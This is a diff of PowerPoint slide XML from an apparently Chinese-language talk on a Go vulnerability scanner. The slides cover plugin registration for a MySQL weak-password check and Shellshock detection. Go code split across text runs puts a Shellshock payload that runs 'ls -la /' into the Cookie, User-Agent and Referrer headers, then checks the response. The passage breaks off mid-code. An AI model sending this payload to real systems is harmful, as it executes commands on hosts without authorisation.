-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>GoPlugin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> interface {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   Init() Plugin</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   Check(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> string, meta </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>TaskMeta</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) bool</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>GetResult</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>() []Plugin</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
-              <a:t>插件</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>采用自注册的模式，这里使用了</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>go</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>语言的一个语法特性，在包初始化的时候将自己注册到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>pulgin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>树，如下是</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>mysql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>弱密码检测插件自注册的代码</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>func</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>() {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>plugin.Regist</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>mysql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>", &amp;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>mysqlWeakPass</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>{})</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>通过网站</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
+              <a:t>www.seebug.org</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
+              <a:t>vuldb</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>/ssvid-88877</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>提供的破壳漏洞检测代码，我们使用想远程的地址发送</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>() { :;};echo ; echo; echo $(/bin/ls -la /);</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
+              <a:t>命令</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>，然后检查响应体，通过检查响应体中是否有</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
+              <a:t>drwxr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
+              <a:t>xr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>-x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>权限来判断是否能获取权限，虽然漏洞非常危险，但是检测起来思路还是比较明晰，实现代码如下：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2395209562"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9686266"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9617,6 +8035,1968 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
+          <p:cNvPr id="4" name="矩形 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E66787B-38C1-3D45-BFE8-D65BFE28839F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2446751" y="0"/>
+            <a:ext cx="6096000" cy="6524863"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>pocList</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> := []</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>string</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>{</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"() { :;};echo ; echo; echo $(/bin/ls -la /);"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>,</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="787878"/>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>for </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>_</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>range </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>pocList</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>NewRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"GET"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>checkURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>nil</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>request.Header.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Set</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"cookie"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>request.Header.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Set</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"User-Agent"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>request.Header.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Set</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"Referrer"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   resp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>util</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>RequestDo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>true</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6897BB"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>15</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>err != </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>nil </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>{</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>strings</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>drwxr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>xr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>-x"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>) &amp;&amp; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>strings</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>etc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>) {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
